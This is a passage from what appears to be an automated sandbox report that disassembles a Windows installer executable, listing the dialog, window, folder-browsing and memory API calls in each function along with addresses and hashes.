                                                                                                                                                                • Instruction Fuzzy Hash: 8D214F7650021ABFCB019FB8DD48EEF3B69FB08351F004525FA11E2291CB35D920CB65
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 004091A7: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004091EF
                                                                                                                                                                  • Part of subcall function 004091A7: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040920F
                                                                                                                                                                  • Part of subcall function 004091A7: GetDlgItem.USER32(?,000004B7), ref: 00409222
                                                                                                                                                                  • Part of subcall function 004091A7: SetWindowLongW.USER32(00000000,000000FC,Function_00007F86), ref: 00409230
                                                                                                                                                                  • Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
                                                                                                                                                                  • Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961
                                                                                                                                                                  • Part of subcall function 00407920: GetDlgItem.USER32(?,?), ref: 0040792C
                                                                                                                                                                • GetDlgItem.USER32(?,000004B6), ref: 004094A8
                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 004094AB
                                                                                                                                                                • CreateWindowExA.USER32(00000200,Edit,0041A840,500100A0,?,?,?,?,?,000004B6,00000000,00000000), ref: 004094E1
                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004094F1
                                                                                                                                                                • GetDlgItem.USER32(?,000004B6), ref: 004094FE
                                                                                                                                                                • SendMessageW.USER32(00000000,00000030,?,00000001), ref: 00409508
                                                                                                                                                                • GetDlgItem.USER32(?,000004B6), ref: 00409512
                                                                                                                                                                • SetFocus.USER32(00000000), ref: 00409515
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Item$Window$MessageSend$CreateDestroyDirectoryFileFocusInfoLongShowSystem
                                                                                                                                                                • String ID: Edit
                                                                                                                                                                • API String ID: 2563414232-554135844
                                                                                                                                                                • Opcode ID: 1c951395b049d258c5149e896e0566e3ea25c6708d6124f10a7b0945db6253a7
                                                                                                                                                                • Instruction ID: 4d71b540c7600c41684bbba3335aa98688d5166c257b7e93b864b054f1ea387c
                                                                                                                                                                • Opcode Fuzzy Hash: 1c951395b049d258c5149e896e0566e3ea25c6708d6124f10a7b0945db6253a7
                                                                                                                                                                • Instruction Fuzzy Hash: DA116A71A00204BFEB11ABE5DD49FAFBBBCEF48B00F104429B201F61A1C675AD50876D
                                                                                                                                                                APIs
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403EDF
                                                                                                                                                                  • Part of subcall function 00402D03: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00402D76
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403F05
                                                                                                                                                                • wsprintfA.USER32 ref: 00403F27
                                                                                                                                                                • wsprintfA.USER32 ref: 00403F54
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$wsprintf
                                                                                                                                                                • String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                                                                                                • API String ID: 2704270482-695273242
                                                                                                                                                                • Opcode ID: 33b53d402eec6e8f3b12914186b2c5884ffcd7aa6b788d70cfced2d98aefbe1a
                                                                                                                                                                • Instruction ID: 886d926ed7ba0351d4e9ba57da7cb0629939e873fb03075975f52044c447bd08
                                                                                                                                                                • Opcode Fuzzy Hash: 33b53d402eec6e8f3b12914186b2c5884ffcd7aa6b788d70cfced2d98aefbe1a
                                                                                                                                                                • Instruction Fuzzy Hash: 15218F71A005187BDB05EAA59C86EFE73ADAB48704F14402EF504E31D1CB7DAA068799
                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,000004B3), ref: 0040779F
                                                                                                                                                                • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004077B2
                                                                                                                                                                • GetDlgItem.USER32(?,000004B4), ref: 004077BC
                                                                                                                                                                • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004077C4
                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004077D4
                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 004077DD
                                                                                                                                                                • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004077E5
                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 004077EE
                                                                                                                                                                • SetFocus.USER32(00000000,?,?,00000000,00408726,000004B3,00000000,?,000004B3), ref: 004077F1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ItemMessageSend$Focus
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3946207451-0
                                                                                                                                                                • Opcode ID: 68307c55e08eac57185263add51eb06e4822709b00eeca7ae34a923681d662df
                                                                                                                                                                • Instruction ID: d34367ada3e0903658dac9af1ca1aef10e4e5856eabac84c2cebdb26553fe681
                                                                                                                                                                • Opcode Fuzzy Hash: 68307c55e08eac57185263add51eb06e4822709b00eeca7ae34a923681d662df
                                                                                                                                                                • Instruction Fuzzy Hash: A4F04F712403087BEA216B61DD86F9BBB5EDF80B54F018425F354661F0CBF7AC209A29
                                                                                                                                                                APIs
                                                                                                                                                                • memcpy.MSVCRT(?,0041E470,00000160), ref: 00407E20
                                                                                                                                                                • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00407E3F
                                                                                                                                                                • GetDC.USER32(00000000), ref: 00407E4A
                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00407E56
                                                                                                                                                                • MulDiv.KERNEL32(?,00000048,00000000), ref: 00407E65
                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00407E73
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00407E9B
                                                                                                                                                                • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00007643), ref: 00407ED0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2693764856-0
                                                                                                                                                                • Opcode ID: 6fe21de5e6cf46c2e38258430ab068c08d1ba9f3266b2be4710a35066139e936
                                                                                                                                                                • Instruction ID: 8154b001b0011d5121478cb58b91efa441906eea3886e432abe560883a3f5ac4
                                                                                                                                                                • Opcode Fuzzy Hash: 6fe21de5e6cf46c2e38258430ab068c08d1ba9f3266b2be4710a35066139e936
                                                                                                                                                                • Instruction Fuzzy Hash: 8421C375941318BFD7215BA1DD48EEB7B7CFF04301F0040B6FA09A2291D7744E948B6A
                                                                                                                                                                APIs
                                                                                                                                                                • GetDC.USER32(?), ref: 0040797F
                                                                                                                                                                • GetSystemMetrics.USER32(0000000B), ref: 0040799B
                                                                                                                                                                • GetSystemMetrics.USER32(0000003D), ref: 004079A4
                                                                                                                                                                • GetSystemMetrics.USER32(0000003E), ref: 004079AC
                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 004079C9
                                                                                                                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004079E4
                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00407A0A
                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 00407A19
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2466489532-0
                                                                                                                                                                • Opcode ID: 361b9f72db81968066b11de39633dd2aeb039f56a0627fc63b5b1369e6440dec
                                                                                                                                                                • Instruction ID: 872bb3bd96abf1d963658246664a9f9dec04eac668a7313924c28ae5c7f0044f
                                                                                                                                                                • Opcode Fuzzy Hash: 361b9f72db81968066b11de39633dd2aeb039f56a0627fc63b5b1369e6440dec
                                                                                                                                                                • Instruction Fuzzy Hash: FF216871901209AFCB01CF69DD44A9EBFF4FF08360F10C46AE519A72A0D335AA50DF41
                                                                                                                                                                APIs
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040895B
                                                                                                                                                                • GetDlgItem.USER32(?,000004B8), ref: 00408979
                                                                                                                                                                • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 0040898B
                                                                                                                                                                • wsprintfW.USER32 ref: 004089A9
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00408A41
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                                                                                                                • String ID: %d%%
                                                                                                                                                                • API String ID: 3753976982-1518462796
                                                                                                                                                                • Opcode ID: 51ae72c57df79fbb6cbb7e6395a09830993c207f45adbfda5b45f62387b44217
                                                                                                                                                                • Instruction ID: dc12f65f6354bcef20b20b64e73197b6a82627a21fa16bd919092f53849079ab
                                                                                                                                                                • Opcode Fuzzy Hash: 51ae72c57df79fbb6cbb7e6395a09830993c207f45adbfda5b45f62387b44217
                                                                                                                                                                • Instruction Fuzzy Hash: C531B371500208BFCB11AF51DD45EEA7BB9FF48304F10802EF986B62E1DB79A910CB59
                                                                                                                                                                APIs
                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 00408B52
                                                                                                                                                                • KillTimer.USER32(?,00000001), ref: 00408B63
                                                                                                                                                                • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408B8D
                                                                                                                                                                • SuspendThread.KERNEL32(00000270), ref: 00408BA6
                                                                                                                                                                • ResumeThread.KERNEL32(00000270), ref: 00408BC3
                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 00408BE5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DialogThreadTimer$KillResumeSuspend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4151135813-0
                                                                                                                                                                • Opcode ID: 636331c51eeec99492c3656744559ca8cb25bf13f1d29267e4cf69c729943fa4
                                                                                                                                                                • Instruction ID: 672def9565bfc40134271a6b6781851c3b106654d45cfef20a52af227c3b9f34
                                                                                                                                                                • Opcode Fuzzy Hash: 636331c51eeec99492c3656744559ca8cb25bf13f1d29267e4cf69c729943fa4
                                                                                                                                                                • Instruction Fuzzy Hash: 101191B4202608EFE7215F52EE85EA7777CFB44745700843EF986A66A1CF396C10DA1D
                                                                                                                                                                APIs
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041A7E8,?,?,00000000,00404980,?,?,?,?,004068AF,00000000), ref: 004041F8
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041A7D8,?,?,?,%%T\,0041A7E8,?,?,00000000,00404980,?,?), ref: 00404236
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041A7D8,?,?,?,%%T\,0041A7E8,?,?,00000000), ref: 0040425C
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041A7D8,?,?,?,%%T\,0041A7E8,?,?), ref: 00404264
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                • String ID: %%T/$%%T\
                                                                                                                                                                • API String ID: 613200358-2679640699
                                                                                                                                                                • Opcode ID: 32ef79d1291380c273689fbeb54a3f068f011761e48dfc995dcc37c28d559008
                                                                                                                                                                • Instruction ID: df8026740f1f86ca471eb2ea0e41fa98444a64685e80cf153ceacd7fb444c2e9
                                                                                                                                                                • Opcode Fuzzy Hash: 32ef79d1291380c273689fbeb54a3f068f011761e48dfc995dcc37c28d559008
                                                                                                                                                                • Instruction Fuzzy Hash: D411C97190010AAACF05FFA2D856CEDBB78AF14708F10846AB551760E2DF789B95CB48
                                                                                                                                                                APIs
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041A7E8,?,?,00000000,00404980,?,?,?,?,004068AF,00000000), ref: 004042B3
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041A7D8,?,?,?,%%S\,0041A7E8,?,?,00000000,00404980,?,?), ref: 004042F1
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041A7D8,?,?,?,%%S\,0041A7E8,?,?,00000000), ref: 00404317
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041A7D8,?,?,?,%%S\,0041A7E8,?,?), ref: 0040431F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                • String ID: %%S/$%%S\
                                                                                                                                                                • API String ID: 613200358-358529586
                                                                                                                                                                • Opcode ID: 234a46bb65b67f966a8e437df7229c99e997b16022daf5c37f9ee439fb3c0353
                                                                                                                                                                • Instruction ID: 4488bc9e4ce621475e7ac020b16d4e8be87a05eb600b5e71f20f3fc481b48b4f
                                                                                                                                                                • Opcode Fuzzy Hash: 234a46bb65b67f966a8e437df7229c99e997b16022daf5c37f9ee439fb3c0353
                                                                                                                                                                • Instruction Fuzzy Hash: 7811C975900109AACF05FFA2D856CEDBB78AF14308F10846AF561760E2DF789B99CB48
                                                                                                                                                                APIs
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041A7E8,?,?,00000000,00404980,?,?,?,?,004068AF,00000000), ref: 0040436E
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041A7D8,?,?,?,%%M\,0041A7E8,?,?,00000000,00404980,?,?), ref: 004043AC
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041A7D8,?,?,?,%%M\,0041A7E8,?,?,00000000), ref: 004043D2
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041A7D8,?,?,?,%%M\,0041A7E8,?,?), ref: 004043DA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                • String ID: %%M/$%%M\
                                                                                                                                                                • API String ID: 613200358-4143866494
                                                                                                                                                                • Opcode ID: 912668388eac2bfc377ae5e16b5c219b7d863f1ca1c26d4b178e3f78348507e0
                                                                                                                                                                • Instruction ID: 1e1ecd5a4810495ff1b5747c8ad1555e4ca49c286c4952b26a2a60c5b9476409
                                                                                                                                                                • Opcode Fuzzy Hash: 912668388eac2bfc377ae5e16b5c219b7d863f1ca1c26d4b178e3f78348507e0
                                                                                                                                                                • Instruction Fuzzy Hash: D411C971900109AACF05FFA2D856CEDBB79AF14308F10846AF551760E2DF785A9ACB58
                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 00408519
                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00408532
                                                                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 0040854E
                                                                                                                                                                • SHGetMalloc.SHELL32(00000000), ref: 00408578
                                                                                                                                                                  • Part of subcall function 004082F3: GetDlgItem.USER32(?,000004B6), ref: 00408300
                                                                                                                                                                  • Part of subcall function 004082F3: SetFocus.USER32(00000000,?,?,004083E7,000004B6,?), ref: 00408307
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                                                                                                                • String ID: A$A
                                                                                                                                                                • API String ID: 1557639607-3025247501
                                                                                                                                                                • Opcode ID: 7184c409714950e4399974884f9922c096c63a12bd23a875202a47cc40967fbf
                                                                                                                                                                • Instruction ID: 8e2b46382c4e0e79c38c40a6d9053323f47f27154f6d6a29afbbbbb9270b0dc0
                                                                                                                                                                • Opcode Fuzzy Hash: 7184c409714950e4399974884f9922c096c63a12bd23a875202a47cc40967fbf
                                                                                                                                                                • Instruction Fuzzy Hash: 41114FB1A00204ABCB10DB95DA48BDE77BCAB88701F1400AEE905E7281DB79DE04CB75
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(uxtheme,?,00409133,000004B1,00000000,?,?,?,?,?,00409240), ref: 00407DB4
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407DC5
                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00407DDE
                                                                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00407DF4
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$AddressLibraryLoadProc
                                                                                                                                                                • String ID: SetWindowTheme$uxtheme
                                                                                                                                                                • API String ID: 324724604-1369271589
                                                                                                                                                                • Opcode ID: df7da54084a7170c4669871585b62670c16e7ba2a7afe7f20da463cc21b0505e
                                                                                                                                                                • Instruction ID: 9b0de1ac587a4165001920f6b170f50534138ecb837747bbddd8b6d978bb5341
                                                                                                                                                                • Opcode Fuzzy Hash: df7da54084a7170c4669871585b62670c16e7ba2a7afe7f20da463cc21b0505e
                                                                                                                                                                • Instruction Fuzzy Hash: D3F0A732E4672533C232126A6C48FAB769CDF46B51B094136BD04F7390DFA8DC4041ED
                                                                                                                                                                APIs
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000044), ref: 0040B824
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B866
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(?,0000001F), ref: 0040B87C
                                                                                                                                                                • memmove.MSVCRT(00000000,?,?,?,0000001F), ref: 0040B899
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0000001F), ref: 0040B8A6
                                                                                                                                                                • memmove.MSVCRT(?,?,?,?,?,0000001F), ref: 0040B8C4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@??3@memmove
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3828600508-0
                                                                                                                                                                • Opcode ID: 47906053c5a29f528d9a88d94d720d9e3123c9d8a4fc5e07c1a02bdcf041b227
                                                                                                                                                                • Instruction ID: 99a0ad40a844e9a3ffa9f049326f458531d7c56977f80c19912095adb51eb10a
                                                                                                                                                                • Opcode Fuzzy Hash: 47906053c5a29f528d9a88d94d720d9e3123c9d8a4fc5e07c1a02bdcf041b227
                                                                                                                                                                • Instruction Fuzzy Hash: 284159B56003048FCB14DF19D880A57B7E9FF88304F14856EEC4A9B346D779E919CBAA
                                                                                                                                                                APIs
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,0041EA30,00000001,0041EA30,0041EA30,00000001,?,00000000), ref: 00405A1E
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0041EA30,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041E464,0041EA30,00000001,?,00000000), ref: 00405A80
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0041EA30,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041E464,0041EA30,00000001,?,00000000), ref: 00405A98
